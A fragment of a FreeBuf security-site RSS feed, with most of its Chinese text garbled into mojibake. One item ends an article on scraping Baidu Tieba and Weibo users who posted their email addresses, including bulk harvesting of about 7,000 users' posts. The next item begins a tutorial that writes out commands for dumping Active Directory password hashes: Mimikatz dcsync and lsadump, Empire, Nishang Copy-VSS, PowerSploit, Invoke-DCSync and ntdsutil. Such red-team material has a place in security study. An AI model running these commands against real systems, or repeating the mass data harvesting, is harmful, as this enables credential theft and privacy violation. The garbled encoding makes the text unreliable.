基于上述结论,有如下推测:若将SNS的用户有特定需求包括ä¸é™äºŽå…±äº«æ€§éœ€æ±‚æ—¶ï¼Œè®°ä¸ºä¸€ä¸ªè§¦å‘æ¡ä»¶ã€‚éšç§æ‚–论导致的éšç§æ³„露,为å¶ç„¶äº‹ä»¶ã€‚则éé‡è¯¥äº‹ä»¶çš„用户在æ£å¸¸æ´»åŠ¨ä¸Žæ³„éœ²éšç§ä¸¤ç§çжæ€ä¸éšæ—¶åˆ‡æ¢ã€‚å½“è§¦å‘æ¡ä»¶æ»¡è¶³æ—¶ï¼Œç”¨æˆ·ç‰ºç‰²ä¸ªäººéšç§æ¢å–满足需求;而在需求满足åŽï¼Œåˆç»§ç»æ£å¸¸çš„社交活动。所以该类用户属于普通用户的å集,且未必是真å集。 五ã€å»ºè®®çš„解决办法  SNSæœåŠ¡ç«¯çš„å®‰å…¨ç–ç•¥ 1)创建资æºå…±äº«ç‰¹æ®ŠåŸŸï¼Œç”¨ä»¥èµ„æºå…±äº«åŠåˆ†å‘,完æˆç«™å†…资æºäº¤æµï¼Œé¿å…SNS之间产生交å‰ï¼Œå¯¼è‡´ç”¨æˆ·SNS间关系被攻击者连接。 2)以用户关系深度作为信任度。 3)资æºå…±äº«åŒºåŸŸä¿¡æ¯å¯¹ä½Žä¿¡ä»»åº¦ç”¨æˆ·ä¸å¯è§ï¼Œè¿‡æ»¤éƒ¨åˆ†éžæ´»è·ƒSNSæ”»å‡»è€…åŠæ”»å‡»è´¦æˆ·ï¼Œå¢žåŠ æ”»å‡»æˆæœ¬ã€‚ 4)进入资æºå…±äº«åŒºåŸŸéœ€è¦SNSäº¤æµæŸè€—(包括ä¸é™äºŽè®ºå›å¸),进一æ¥å¢žåŠ æ”»å‡»æˆæœ¬ï¼Œé¿å…å‡ºçŽ°å¤§è§„æ¨¡æ‰¹é‡æ”»å‡»ã€‚ 通过隔离开SNSä¸ç”¨æˆ·å…±äº«æ€§éœ€æ±‚与表达性需求的实现区域,将éšç§ä¿¡æ¯åˆ†ç¦»å¹¶ä¿æŠ¤èµ·æ¥ã€‚并且通过æƒé™è®¾ç½®ä»¥åŠæœ‰å¿èŽ·å–在ä¸å½±å“ç”¨æˆ·ä½¿ç”¨çš„æƒ…å†µä¸‹å¢žåŠ èŽ·å–éš¾åº¦ã€‚å¢žåŠ æ”»å‡»è€…è‡ªåŠ¨åŒ–æ”»å‡»SNSçš„æˆæœ¬ï¼Œå¢žåŠ äº†æ”»å‡»è€…è¿›è¡Œç¤¾ä¼šå·¥ç¨‹å¦æ”»å‡»çš„éš¾åº¦ï¼Œä»Žè€Œä¿æŠ¤äº†ç”¨æˆ·çš„ä¿¡æ¯å®‰å…¨ã€‚ æœç´¢å¼•擎端的使用é™åˆ¶ 1)制作SNS网站åå•,收录该åå•内信æ¯ï¼Œå¹¶æä¾›æ™®é€šæ£€ç´¢æœåŠ¡ã€‚ä¸æä¾›æˆ–æœ‰é™åˆ¶æä¾›å¦‚site,inurlç‰è¯æ³•的使用。 2)对æœç´¢è¯å¥è¿›è¡Œåˆ†æžï¼Œå¦‚å‘çŽ°åŒ…å«æ•感信æ¯ä¸”ä½¿ç”¨äº†é«˜çº§è¯æ³•ï¼Œåˆ™æ‹’ç»æœåŠ¡ã€‚ 3)使用IP白åå•ç–ç•¥ï¼Œä»…å¯¹æŒ‡å®šæ•™è‚²æˆ–ç ”ç©¶æœºæž„IP段æä¾›é«˜çº§è¯æ³•æœåŠ¡ 4)å…³é—é«˜çº§è¯æ³• 上述四æ¡å¯è¡Œæ€§ä¾æ¬¡é€’å‡ï¼Œå®‰å…¨æ€§ä¾æ¬¡é€’增。è¯è¯´ç™¾åº¦ç½‘盘都能过滤,给自家贴å§è¿‡æ»¤ä¸€ä¸‹å¾ˆè¿‡åˆ†ï¼Ÿ 最åŽï¼Œæ±‚æ»ä¾2。 *æœ¬æ–‡ä½œè€…ï¼šä¸æœ½ä¸‰ä¸æœ½ä¸‰ä¸æœ½ä¸‰ï¼Œæœ¬æ–‡å±ž FreeBuf 原创奖励计划,未ç»è®¸å¯ç¦æ¢è½¬è½½ã€‚]]></description>
1325 <content:encoded><![CDATA[</p>
1326<p><b style="color: rgb(239, 71, 71);">*æœ¬æ–‡ä½œè€…ï¼šä¸æœ½ä¸‰ä¸æœ½ä¸‰ä¸æœ½ä¸‰ï¼Œæœ¬æ–‡å±ž FreeBuf 原创奖励计划,未ç»è®¸å¯ç¦æ¢è½¬è½½ã€‚</b> </p>
1327<blockquote><p>楼主:我有æ»ä¾2资æºï¼Œè¦çš„留邮箱ï¼</p>
1328<p>åƒç“œçš„æˆ‘:楼主好人一生平安~01010101@qq.com,谢谢。</p>
1329</blockquote>
1330<p><b>æŸä¸ªé—²çš„æ— èŠçš„人: site:tieba.baidu.com 01010101@qq.com </b></p>
1331<p><b style="color: rgb(0, 176, 80);">本文主è¦ä»¥ç™¾åº¦è´´å§å’Œå¾®åšä¸ºä¾‹ï¼Œåˆ†æžæŽ¢è®¨ç¤¾äº¤ç½‘络上的éšç§ä¸»åŠ¨æ³„éœ²çŽ°è±¡ã€‚</b></p>
1332<h2>一ã€ä¸»è¦æ€è·¯</h2>
1333<p>如果是针对个体用户,比如<b>已知个人信æ¯</b>,且这个信æ¯å¯ä»¥ä¸Žå…¶ç¤¾äº¤ç½‘络ä¸çš„æŸè´¦æˆ·å½¢æˆå•射关系。那么利用信æ¯Xæž„é€ payload,直接使用百度的siteè¯æ³•å¯¹ç›®æ ‡SNS进行检索å³å¯ã€‚</p>
1334<p><b style="">æ¤æ—¶ä¸ä¸€å®šèƒ½å¤ŸèŽ·å–足够的数æ®ï¼Œå› 为å•ä¸€ç›®æ ‡æ˜¯å¦æ›¾æ³„露éšç§æ˜¯ä¸€ä¸ªæœªçŸ¥æ•°ï¼Œå…¶SNSä½¿ç”¨æ·±åº¦ä¹Ÿæ˜¯æœªçŸ¥æ•°ã€‚å› æ¤ï¼Œæ”¹ä½¿ç”¨æ•感信æ¯çš„通é…体进行检索,先获å–用户集åˆï¼Œå†èŽ·å–å‘言情况。具体æµç¨‹å¦‚下:</b></p>
1335<p><img alt="以百度贴å§ä¸ºå…¸åž‹çš„社交网络éšç§ä¸»åŠ¨æ³„éœ²åˆ†æž" src="http://image.3001.net/images/20180719/15319713448989.png!small" width="690" height="637"><b style="color: rgb(38, 38, 38);"><br /></b></p>
1336<h2><b style="color: rgb(38, 38, 38);">二ã€é’ˆå¯¹å•一用户的工具实现</b></h2>
1337<p>å› ä¸ºä»£ç æ°´å¹³å¤ªå·®æˆ‘就䏿”¾github了,emmmm其实就是简å•的爬虫,具体的架构如下:</p>
1338<p><img alt="以百度贴å§ä¸ºå…¸åž‹çš„社交网络éšç§ä¸»åŠ¨æ³„éœ²åˆ†æž" src="http://image.3001.net/images/20180719/15319721103599.png!small" width="690" height="704.2758620689655">éƒ¨åˆ†æ ¸å¿ƒåŠŸèƒ½ä»£ç åŠæ³¨é‡Šå¦‚下:</p>
1339<p><img alt="以百度贴å§ä¸ºå…¸åž‹çš„社交网络éšç§ä¸»åŠ¨æ³„éœ²åˆ†æž" src="http://image.3001.net/images/20180719/15319721622658.png!small" width="690" height="574"><img alt="以百度贴å§ä¸ºå…¸åž‹çš„社交网络éšç§ä¸»åŠ¨æ³„éœ²åˆ†æž" src="http://image.3001.net/images/20180719/153197223251.png!small" width="690" height="793">那么完æˆçš„æ•ˆæžœå°±æ˜¯ï¼Œè¾“å…¥æŸä¸€ä¸ªä¿¡æ¯ï¼Œå®ƒè¿”å›žç»™ä½ æŒ‡å®šç¤¾äº¤ç½‘ç»œä¸ä¸Žå…¶ç›¸å…³çš„ç”¨æˆ·ã€‚ä½ ç¡®å®šç”¨æˆ·å,它继ç»çˆ¬å–该用户的所有å‘言记录。以åŽç¿»ä¸œè¥¿å†ä¹Ÿä¸ç”¨è‡ªå·±æ…¢æ…¢æ‰¾äº†~</p>
1340<p><span style="color: rgb(239, 71, 71);">å¦å¤–由于比较懒,åªåšäº†è´´å§åŠå¾®åšä¸¤ä¸ªSNS</span></p>
1341</p>
1342<h2>ä¸‰ã€æ€è·¯æŽ¨å¹¿ï¼Œå³èŽ·å–大釿•°æ®çš„æ–¹æ³•</h2>
1343</p>
1344</p>
1345<p><img alt="以百度贴å§ä¸ºå…¸åž‹çš„社交网络éšç§ä¸»åŠ¨æ³„éœ²åˆ†æž" src="http://image.3001.net/images/20180719/1531972477215.png!small" width="690" height="413">说起æ¥éº»çƒ¦ï¼Œå…¶å®žå°±æ˜¯ç®€å•替æ¢äº†ä¸ªpayload,ä¸å†å±€é™äºŽçœ‹æŸä¸ªäººï¼Œè€Œæ˜¯ummmä½ ä»¬è¿™äº›ç•™è¿‡é‚®ç®±çš„éƒ½ç»™æˆ‘è¿‡æ¥ã€‚最åŽå¦‚上图所说,拿了个23MB的文本。</p>
1346</p>
1347</p>
1348<p>ç”±äºŽæœ‰å¤§é‡æ£åˆ™æ“ä½œï¼Œçˆ¬è™«è·‘çš„å¾ˆæ…¢ï¼Œåœ¨äº‘ä¸Šè·‘äº†æœ‰ä¸ªå››äº”å¤©æ‰æŠŠè¿™ä¸ƒåƒå¤šä¸ªç”¨æˆ·è·‘å®Œã€‚åŠ äº†å¤šçº¿ç¨‹ä½†æ˜¯ä¼¼ä¹Žæ²¡æœ‰ä»€ä¹ˆæ”¹å–„ï¼Ÿ</p>
1349</p>
1350</p>
1351<h2>å››ã€æ–‡æœ¬è¯æ–™å¤„ç†</h2>
1352</p>
1353</p>
1354<h3>4.1 è¯æ–™é¢„处ç†åŠåŽç»æ“作</h3>
1355</p>
1356</p>
1357<p>æ¤æ—¶æ‰‹é‡Œæœ‰ä¸€å¤§æ‰¹ä¸»åŠ¨æ³„éœ²ä¸ªäººéšç§çš„用户å‘言,那当然è¦åˆ†æžä¸€æ³¢ã€‚分æžå‰ï¼Œå…ˆæ´—ä¸€æ³¢è¯æ–™ï¼Œä¹‹åŽåˆ†è¯åŠ å‘é‡åŒ–ã€‚å…·ä½“ä¸»è¦æ¥éª¤å¦‚下:</p>
1358</p>
1359</p>
1360<p><img alt="以百度贴å§ä¸ºå…¸åž‹çš„社交网络éšç§ä¸»åŠ¨æ³„éœ²åˆ†æž" src="http://image.3001.net/images/20180719/15319727874450.png!small" width="690" height="299"> </p>
1361</p>
1362</p>
1363<p>去åœç”¨è¯æœ‰ç”¨æ£åˆ™æœ‰ç”¨ç»“巴,具体åœç”¨è¯åº“æ˜¯å‡ ä¸ªé™¢æ ¡çš„åˆè®¢ç‰ˆã€‚å‘é‡åŒ–直接word2vec,其实SNSå‘言包å«å¤§é‡çš„çŸè¯å’ŒçŸå¯¹è¯ï¼Œä½¿ç”¨æ–‡æœ¬å‘é‡å¯èƒ½æ›´å¥½ï¼Œä½†ç¬”者技术有é™ä¹Ÿæ¯”较懒,直接分è¯ç”¨è¯å‘é‡åšäº†ã€‚</p>
1364</p>
1365</p>
1366<h3><b style="">4.2 对照组选择</b></h3>
1367</p>
1368</p>
1369<p>对照组的选择其实比较麻烦,按æ£å¸¸æ¥è¯´ï¼Œæ¤æ—¶èŽ·å¾—çš„æ˜¯ä¸»åŠ¨æ³„éœ²éšç§çš„ä¸å®‰å…¨ç”¨æˆ·çš„å‘è¨€ï¼Œä½ å¯¹ç…§è¯¥é€‰ä¸ªå®‰å…¨ç”¨æˆ·ã€‚å¯å®‰å…¨ç”¨æˆ·å¤ªéš¾ç•Œå®šäº†ï¼Œå³æˆ‘找到一æ¡ä½ 留有个人éšç§çš„å‘è¨€ä½ å°±æ˜¯ä¸å®‰å…¨çš„,å¯ä½ è¦æ‰€æœ‰å‘è¨€éƒ½æ²¡æœ‰é—®é¢˜æ‰æ˜¯å®‰å…¨çš„。这里å·å·¥å‡æ–™é€‰ç”¨2012å¹´ccf的微åšåˆ†æžæ–‡æœ¬ã€‚é•¿è¿™ä¸ªæ ·å:</p>
1370</p>
1371</p>
1372<p><img alt="image.png以百度贴å§ä¸ºå…¸åž‹çš„社交网络éšç§ä¸»åŠ¨æ³„éœ²åˆ†æž" src="http://image.3001.net/images/20180719/15319733462915.png!small" width="690" height="602"> </p>
1373</p>
1374</p>
1375<h3><img alt="以百度贴å§ä¸ºå…¸åž‹çš„社交网络éšç§ä¸»åŠ¨æ³„éœ²åˆ†æž" src="http://image.3001.net/images/20180719/1531973329613.png!small" width="690" height="415"><b style="">4.3 å¯è§†åŒ–结果</b></h3>
1376</p>
1377</p>
1378<p>其实å‘é‡åŒ–过程ä¸ï¼Œåˆå§‹æ˜¯3M+个300ç»´å‘é‡ï¼Œç„¶åŽé™ç»´åˆ°äºŒç»´çš„è¯ï¼Œæˆ‘çš„å°ç ´æœ¬æœ‰ç‚¹è·‘ä¸åŠ¨ï¼Œå°±åœ¨åˆ†è¯é˜¶æ®µæŒ‰ç…§æƒé‡å…ˆåšäº†ä¸ªç›é€‰ã€‚对更具有代表性的若干个å‘é‡è¿›è¡Œäº†é™ç»´ã€‚如下图所示,这是å‰ä¸‰æ¬¡ï¼š</p>
1379</p>
1380</p>
1381<p><img alt="以百度贴å§ä¸ºå…¸åž‹çš„社交网络éšç§ä¸»åŠ¨æ³„éœ²åˆ†æž" src="http://image.3001.net/images/20180719/1531973421140.png!small" width="690" height="385">å¯ä»¥çœ‹åˆ°è“è‰²å¯¹ç…§ç»„ï¼Œæ¤æ—¶å˜åœ¨å°è§„模的èšç±»æƒ…况,这是由于对照组文本本身具有一定的è¯é¢˜æ€§ã€‚</p>
1382</p>
1383</p>
1384<p>而当æƒé‡ä¸ºTop20k时,对照情况如下:</p>
1385</p>
1386</p>
1387<p><img alt="以百度贴å§ä¸ºå…¸åž‹çš„社交网络éšç§ä¸»åŠ¨æ³„éœ²åˆ†æž" src="http://image.3001.net/images/20180719/15319736119650.png!small" width="690" height="345"> </p>
1388</p>
1389</p>
1390<p>与之å‰ä¸‰æ¬¡å®žéªŒæœ‰æ‰€ä¸åŒï¼Œéšç€è€ƒè™‘范围的扩大,对照组的å°è§„模èšç±»æƒ…å†µä¹Ÿé€æ¸æ¶ˆå¤±ã€‚两组å‘é‡åˆ†å¸ƒèŒƒå›´æŽ¥è¿‘ï¼Œæ— æ˜Žæ˜¾å·®å¼‚ã€‚æ¤æ—¶è¯æ˜Žï¼ŒSNSéšç§æ‚–论导致的泄露éšç§ç”¨æˆ·ï¼Œåœ¨å‘è¨€ä¸Šä¸Žä¸€èˆ¬ç”¨æˆ·æ— æ˜Žæ˜¾å·®å¼‚ï¼Œå‘è¨€æ— æ˜Žæ˜¾èšç±»ã€‚<b>å³é€šè¿‡å‘è¨€åˆ¤æ–æŸç”¨æˆ·æ˜¯å¦å˜åœ¨å®‰å…¨éšæ‚£ï¼Œä¸å¯è¡Œã€‚</b></p>
1391</p>
1392</p>
1393<p>基于上述结论,有如下推测:<b>若将SNS的用户有特定需求包括ä¸é™äºŽå…±äº«æ€§éœ€æ±‚æ—¶ï¼Œè®°ä¸ºä¸€ä¸ªè§¦å‘æ¡ä»¶ã€‚éšç§æ‚–论导致的éšç§æ³„露,为å¶ç„¶äº‹ä»¶ã€‚则éé‡è¯¥äº‹ä»¶çš„用户在æ£å¸¸æ´»åŠ¨ä¸Žæ³„éœ²éšç§ä¸¤ç§çжæ€ä¸éšæ—¶åˆ‡æ¢ã€‚å½“è§¦å‘æ¡ä»¶æ»¡è¶³æ—¶ï¼Œç”¨æˆ·ç‰ºç‰²ä¸ªäººéšç§æ¢å–满足需求;而在需求满足åŽï¼Œåˆç»§ç»æ£å¸¸çš„社交活动。所以该类用户属于普通用户的å集,且未必是真å集。</b></p>
1394<h2>五ã€å»ºè®®çš„解决办法</h2>
1395</p>
1396</p>
1397<h3> SNSæœåŠ¡ç«¯çš„å®‰å…¨ç–ç•¥</h3>
1398</p>
1399<blockquote><p>1)创建资æºå…±äº«ç‰¹æ®ŠåŸŸï¼Œç”¨ä»¥èµ„æºå…±äº«åŠåˆ†å‘,完æˆç«™å†…资æºäº¤æµï¼Œé¿å…SNS之间产生交å‰ï¼Œå¯¼è‡´ç”¨æˆ·SNS间关系被攻击者连接。</p>
1400<p>2)以用户关系深度作为信任度。</p>
1401<p>3)资æºå…±äº«åŒºåŸŸä¿¡æ¯å¯¹ä½Žä¿¡ä»»åº¦ç”¨æˆ·ä¸å¯è§ï¼Œè¿‡æ»¤éƒ¨åˆ†éžæ´»è·ƒSNSæ”»å‡»è€…åŠæ”»å‡»è´¦æˆ·ï¼Œå¢žåŠ æ”»å‡»æˆæœ¬ã€‚</p>
1402<p>4)进入资æºå…±äº«åŒºåŸŸéœ€è¦SNSäº¤æµæŸè€—(包括ä¸é™äºŽè®ºå›å¸),进一æ¥å¢žåŠ æ”»å‡»æˆæœ¬ï¼Œé¿å…å‡ºçŽ°å¤§è§„æ¨¡æ‰¹é‡æ”»å‡»ã€‚</p>
1403</blockquote>
1404</p>
1405<p><b style="">通过隔离开SNSä¸ç”¨æˆ·å…±äº«æ€§éœ€æ±‚与表达性需求的实现区域,将éšç§ä¿¡æ¯åˆ†ç¦»å¹¶ä¿æŠ¤èµ·æ¥ã€‚并且通过æƒé™è®¾ç½®ä»¥åŠæœ‰å¿èŽ·å–在ä¸å½±å“ç”¨æˆ·ä½¿ç”¨çš„æƒ…å†µä¸‹å¢žåŠ èŽ·å–éš¾åº¦ã€‚å¢žåŠ æ”»å‡»è€…è‡ªåŠ¨åŒ–æ”»å‡»SNSçš„æˆæœ¬ï¼Œå¢žåŠ äº†æ”»å‡»è€…è¿›è¡Œç¤¾ä¼šå·¥ç¨‹å¦æ”»å‡»çš„éš¾åº¦ï¼Œä»Žè€Œä¿æŠ¤äº†ç”¨æˆ·çš„ä¿¡æ¯å®‰å…¨ã€‚</b></p>
1406</p>
1407</p>
1408<h3>æœç´¢å¼•擎端的使用é™åˆ¶</h3>
1409</p>
1410<blockquote><p>1)制作SNS网站åå•,收录该åå•内信æ¯ï¼Œå¹¶æä¾›æ™®é€šæ£€ç´¢æœåŠ¡ã€‚ä¸æä¾›æˆ–æœ‰é™åˆ¶æä¾›å¦‚site,inurlç‰è¯æ³•的使用。</p>
1411<p>2)对æœç´¢è¯å¥è¿›è¡Œåˆ†æžï¼Œå¦‚å‘çŽ°åŒ…å«æ•感信æ¯ä¸”ä½¿ç”¨äº†é«˜çº§è¯æ³•ï¼Œåˆ™æ‹’ç»æœåŠ¡ã€‚</p>
1412<p>3)使用IP白åå•ç–ç•¥ï¼Œä»…å¯¹æŒ‡å®šæ•™è‚²æˆ–ç ”ç©¶æœºæž„IP段æä¾›é«˜çº§è¯æ³•æœåŠ¡</p>
1413<p>4)å…³é—é«˜çº§è¯æ³•</p>
1414</blockquote>
1415</p>
1416<p><b>上述四æ¡å¯è¡Œæ€§ä¾æ¬¡é€’å‡ï¼Œå®‰å…¨æ€§ä¾æ¬¡é€’增。è¯è¯´ç™¾åº¦ç½‘盘都能过滤,给自家贴å§è¿‡æ»¤ä¸€ä¸‹å¾ˆè¿‡åˆ†ï¼Ÿ</b></p>
1417<p><b>最åŽï¼Œæ±‚æ»ä¾2。</b><span></span></p>
1418<p><b style="color: rgb(239, 71, 71);">*æœ¬æ–‡ä½œè€…ï¼šä¸æœ½ä¸‰ä¸æœ½ä¸‰ä¸æœ½ä¸‰ï¼Œæœ¬æ–‡å±ž FreeBuf 原创奖励计划,未ç»è®¸å¯ç¦æ¢è½¬è½½ã€‚</b></p>
1419]]></content:encoded>
1420 <wfw:commentRss>http://www.freebuf.com/articles/neopoints/178013.html/feed</wfw:commentRss>
1421 <slash:comments>22</slash:comments>
1422 </item>
1423 <item>
1424 <title>导出域密ç å“ˆå¸Œå€¼çš„å¤šç§æ–¹æ³•介ç»</title>
1425 <link>http://www.freebuf.com/articles/system/177764.html</link>
1426 <comments>http://www.freebuf.com/articles/system/177764.html#comments</comments>
1427 <pubDate>Wed, 25 Jul 2018 05:00:29 +0000</pubDate>
1428 <dc:creator>secist</dc:creator>
1429 <category><![CDATA[系统安全]]></category>
1430 <category><![CDATA[hash]]></category>
1431 <category><![CDATA[密ç ]]></category>
1432
1433 <guid isPermaLink="false">http://www.freebuf.com/?p=177764</guid>
1434 <description><![CDATA[在域内HASH是å˜åœ¨NTDS.DITä¸çš„, NTDS.DIT是一个二进制文件,就ç‰åŒäºŽæœ¬åœ°è®¡ç®—机的SAMæ–‡ä»¶ï¼Œå®ƒçš„å˜æ”¾ä½ç½®æ˜¯%SystemRoot%\ntds\NTDS.DIT。这里é¢åŒ…å«çš„ä¸åªæ˜¯Usernameå’ŒHASH,还有OUã€Groupç‰ä¿¡æ¯ã€‚ å’ŒSAMæ–‡ä»¶ä¸€æ ·ï¼Œè¯¥æ–‡ä»¶ä¹Ÿæ˜¯è¢«ç³»ç»Ÿé”å®šçš„ã€‚å› æ¤ï¼Œæˆ‘ä»¬ä¹Ÿæ— æ³•ç›´æŽ¥å°†å…¶å¤åˆ¶å¹¶æ‹·è´è‡³å…¶å®ƒä½ç½®ï¼Œä»¥æå–å…¶ä¸çš„ä¿¡æ¯ã€‚ ä»¥ä¸‹æ˜¯å‡ ç§æœ€å¸¸è§çš„被用于æå–.dit文件信æ¯çš„æŠ€æœ¯ï¼š 1.Domain Controller Replication Services(域控制器å¤åˆ¶æœåŠ¡ï¼‰ 2.Native Windows Binaries 3.WMI Mimikatz Mimikatz有一个功能(dcsync),利用目录å¤åˆ¶æœåŠ¡ï¼ˆDRS)从NTDS.DITæ–‡ä»¶ä¸æ£€ç´¢å¯†ç 哈希值。该技术消除了直接从域控制器进行认è¯çš„å¿…è¦æ€§ï¼Œå› 为它å¯ä»¥ä»ŽåŸŸç®¡ç†å‘˜çŽ¯å¢ƒä¸å±žäºŽåŸŸçš„ä»»æ„ç³»ç»Ÿæ‰§è¡Œã€‚å› æ¤ï¼Œè¿™ä¹Ÿæ˜¯ä¸€é¡¹ç”¨äºŽçº¢é˜Ÿçš„æ ‡å‡†æŠ€æœ¯ã€‚ lsadump::dcsync /domain:pentestlab.local /all /csv 通过使用/user傿•°æŒ‡å®šåŸŸç”¨æˆ·å,Mimikatzä¼šå°†è¯¥æŒ‡å®šç”¨æˆ·çš„æ‰€æœ‰å¸æˆ·ä¿¡æ¯è½¬å‚¨åŒ…括哈希值。 lsadump::dcsync /domain:pentestlab.local /user:test 或者我们å¯ä»¥ç›´æŽ¥åœ¨åŸŸæŽ§åˆ¶å™¨ä¸æ‰§è¡ŒMimikatz,通过lsass.exe进程dump密ç 哈希。 privilege::debug lsadump::lsa /inject æ¤æ—¶ï¼Œå°†ä¼šæ£€ç´¢åŸŸç”¨æˆ·çš„密ç 哈希值。 Empire PowerShell Empire有两个模å—,å¯ä»¥é€šè¿‡DCSync攻击检索域哈希。 这两个模å—都需è¦ä»¥åŸŸç®¡ç†å‘˜çš„æƒé™æ‰§è¡Œï¼Œå¹¶ä¸”他们都使用Microsoftå¤åˆ¶æœåŠ¡ã€‚è¿™ä¸¤ä¸ªæ¨¡å—ä¾èµ–于Invoke-Mimikatz PowerShellè„šæœ¬ï¼Œæ¥æ‰§è¡Œä¸ŽDCSync相关的Mimikatz命令。以下模å—的哈希æå–æ ¼å¼ç±»ä¼¼äºŽMetasploit hashdumpçš„è¾“å‡ºæ ¼å¼ã€‚ usemodule credentials/mimikatz/dcsync_hashdump DCSync模å—éœ€è¦æˆ‘们指定用户,以æå–叿ˆ·çš„æ‰€æœ‰ä¿¡æ¯ã€‚ 执行完æˆåŽï¼Œæˆ‘们将获å–到以下信æ¯ï¼š Nishang Nishang是一个PowerShell攻击框架,它是PowerShell攻击脚本和有效载è·çš„一个集åˆï¼Œå¹¶è¢«å¹¿æ³›åº”ç”¨äºŽæ¸—é€æµ‹è¯•çš„å„个阶段。Copy-VSS脚本å¯ç”¨äºŽè‡ªåŠ¨åŒ–çš„æå–需è¦çš„æ–‡ä»¶ï¼šNTDS.DIT,SAMå’ŒSYSTEM。这些文件将被æå–到当å‰çš„å·¥ä½œç›®å½•æˆ–ä½ æŒ‡å®šçš„æ–‡ä»¶å¤¹ä¸ã€‚ Import-Module .\Copy-VSS.ps1 Copy-VSS Copy-VSS -DestinationDir C:\ShadowCopy\ 或者,å¯ä»¥é€šè¿‡åŠ è½½PowerShell扩展,æ¥ä»ŽçŽ°æœ‰çš„Meterpreter会è¯ä¸æ‰§è¡Œè„šæœ¬ã€‚ load powershell powershell_import /root/Copy-VSS.ps1 powershell_execute Copy-VSS 也å¯ä»¥ä½¿ç”¨powershell_shell命令建立一个PowerShell会è¯ï¼Œé€šè¿‡å¯¼å…¥è„šæœ¬æ¥æå–æ–‡ä»¶ã€‚ Copy-VSS Copy-VSS -DestinationDir C:\Ninja PowerSploit PowerSploit包å«PowerShell脚本,该脚本使用å·å½±å¤åˆ¶æœåŠ¡åˆ›å»ºå¯ç”¨äºŽæå–文件的新å·ã€‚ Import-Module .\VolumeShadowCopyTools.ps1 New-VolumeShadowCopy -Volume C:\ Get-VolumeShadowCopy æˆ–è€…é€šè¿‡åŠ è½½PowerShell扩展,从现有的Meterpreter会è¯ä¸æ‰§è¡Œã€‚ powershell_shell New-VolumeShadowCopy -Volume C:\ Get-VOlumeShadowCopy å¯ä»¥ä½¿ç”¨copy命令将文件从新å·å¤åˆ¶åˆ°ç›®æ ‡ã€‚ Invoke-DCSync Invoke-DCSync是一个由Nick Landerså’Œleverages PowerViewå¼€å‘çš„PowerShell脚本,Invoke-ReflectivePEInjectionå’ŒPowerKatcher使用Mimikatzçš„DCSyncæ–¹æ³•æ¥æ£€ç´¢å“ˆå¸Œå€¼ã€‚直接执行该函数将生æˆä»¥ä¸‹è¾“出: Invoke-DCSync å¯ä»¥çœ‹åˆ°ç»“æžœæ˜¯ä»¥è¡¨æ ¼çš„å½¢å¼è¾“å‡ºçš„ã€‚å¦‚æžœæˆ‘ä»¬æ·»åŠ -PWDumpFormat傿•°ï¼Œåˆ™è¾“å‡ºæ ¼å¼ä¸ºuser:id:lm:ntlm::: Invoke-DCSync -PWDumpFormat 从现有的Meterpreter会è¯ä¸è¿è¡Œè„šæœ¬ï¼Œå¯ä»¥èŽ·å–到相åŒçš„输出结果。 æ·»åŠ -PWDumpFormat傿•°åŽï¼š ntdsutil ntdsutil是一个命令行工具,是域控制器生æ€ç³»ç»Ÿçš„一部分,其主è¦ç”¨é€”是使管ç†å‘˜èƒ½å¤Ÿè½»æ¾è®¿é—®å’Œç®¡ç†Windows Active Directoryæ•°æ®åº“ã€‚ä½†å®ƒå¸¸è¢«æ¸—é€æµ‹è¯•人员或红队队员滥用æ¥èŽ·å–现有的ntds.dit文件快照,并且å¯ä»¥å°†è¯¥æ–‡ä»¶å¤åˆ¶åˆ°æ–°çš„租约ä¸ï¼Œä»¥è¿›è¡Œç¦»çº¿çš„分æžå’Œå¯†ç 哈希的æå–。 ntdsutil activate instance ntds ifm create full C:\ntdsutil quit quit 它将为我们生æˆä¸¤ä¸ªæ–°æ–‡ä»¶å¤¹ï¼šActive Directoryå’ŒRegistry。NTDS.DIT文件将被ä¿å˜åˆ°Active Directoryä¸ï¼Œè€ŒSAMå’ŒSYSTEM文件则将被ä¿å˜åˆ°Registry文件夹ä¸ã€‚ DiskShadow […]]]></description>
1435 <content:encoded><![CDATA[<p><b style="color: rgb(0, 176, 80);"></b></p>
1436<p><b style="color: rgb(0, 176, 80);">在域内HASH是å˜åœ¨NTDS.DITä¸çš„, NTDS.DIT是一个二进制文件,就ç‰åŒäºŽæœ¬åœ°è®¡ç®—机的SAMæ–‡ä»¶ï¼Œå®ƒçš„å˜æ”¾ä½ç½®æ˜¯%SystemRoot%\ntds\NTDS.DIT。这里é¢åŒ…å«çš„ä¸åªæ˜¯Usernameå’ŒHASH,还有OUã€Groupç‰ä¿¡æ¯ã€‚</b></p>
1437<p>å’ŒSAMæ–‡ä»¶ä¸€æ ·ï¼Œè¯¥æ–‡ä»¶ä¹Ÿæ˜¯è¢«ç³»ç»Ÿé”å®šçš„ã€‚å› æ¤ï¼Œæˆ‘ä»¬ä¹Ÿæ— æ³•ç›´æŽ¥å°†å…¶å¤åˆ¶å¹¶æ‹·è´è‡³å…¶å®ƒä½ç½®ï¼Œä»¥æå–å…¶ä¸çš„ä¿¡æ¯ã€‚</p>
1438<p>ä»¥ä¸‹æ˜¯å‡ ç§æœ€å¸¸è§çš„被用于æå–.dit文件信æ¯çš„æŠ€æœ¯ï¼š</p>
1439<p>1.Domain Controller Replication Services(域控制器å¤åˆ¶æœåŠ¡ï¼‰</p>
1440<p>2.Native Windows Binaries</p>
1441<p>3.WMI</p>
1442<h2>Mimikatz</h2>
1443<p>Mimikatz有一个功能(dcsync),利用目录å¤åˆ¶æœåŠ¡ï¼ˆDRS)从NTDS.DITæ–‡ä»¶ä¸æ£€ç´¢å¯†ç 哈希值。该技术消除了直接从域控制器进行认è¯çš„å¿…è¦æ€§ï¼Œå› 为它å¯ä»¥ä»ŽåŸŸç®¡ç†å‘˜çŽ¯å¢ƒä¸å±žäºŽåŸŸçš„ä»»æ„ç³»ç»Ÿæ‰§è¡Œã€‚å› æ¤ï¼Œè¿™ä¹Ÿæ˜¯ä¸€é¡¹ç”¨äºŽçº¢é˜Ÿçš„æ ‡å‡†æŠ€æœ¯ã€‚</p>
1444<pre><code>lsadump::dcsync /domain:pentestlab.local /all /csv</code></pre>
1445<p><img alt="1mimikatz-dump-domain-hashes-via-dcsync-clear-version.png" src="http://image.3001.net/images/20180717/15317924197656.png!small" width="690" height="432"></p>
